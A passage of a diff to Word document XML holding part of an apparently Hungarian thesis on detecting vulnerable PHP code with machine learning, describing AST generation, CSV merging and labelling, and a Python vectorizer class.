+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos nevű .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> első oszlop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aiba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> írja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">okat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>listá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ba fűzve.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Az oszlopokat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy olyan karakter választja el, ami az értékek között nem fordul elő, ezáltal </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a program egy automatizált lépésben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nem hoz létre több oszlopot, mint szükséges. Ez a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> karakter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a ^</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
+            <wp:extent cx="5156465" cy="495325"/>
             <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="9" name="Kép 9"/>
+            <wp:docPr id="15" name="Kép 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -15092,7 +17684,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3194214" cy="482625"/>
+                      <a:ext cx="5156465" cy="495325"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -15108,6 +17700,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15123,41 +17716,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>pdo1.php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nem sérülékeny kód</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a tanulo_adatok mappában</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-as ábra: pdo1_ast.csv, a nodes.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15177,61 +17759,165 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> legelső lépésben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a parser.js a grafikus felület által bekért kódra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ezt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> már automatizálja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> következő lépésben a .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fűzi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> össze</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenate.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated.csv fájlb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a. E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a pont</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkéz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>em őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nnak duplikáltjában, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15243,67 +17929,153 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A PHP fájl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">okhoz generált </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST fák</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappábában </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">közel </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>azonos névvel helyezked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>el</w:t>
+        <w:t>A duplikálás oka, miszerint minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezáltal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oka</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pedig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15315,13 +18087,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt kiterjesztéssel.</w:t>
+        <w:t>összefűzött</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15329,19 +18095,1098 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kézett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv-t dolgozza fel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> olyan </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>okat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> létre, ami</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tud.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kifejtve a főbb metódusait:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vectorizer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztály konstruktora</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kér egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fájl nevet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>filename</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy sorban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó fordul elő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_vocab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó van </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ténylegesen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>va van egy számláló (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>), két szótár (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">word2index, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indextoword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
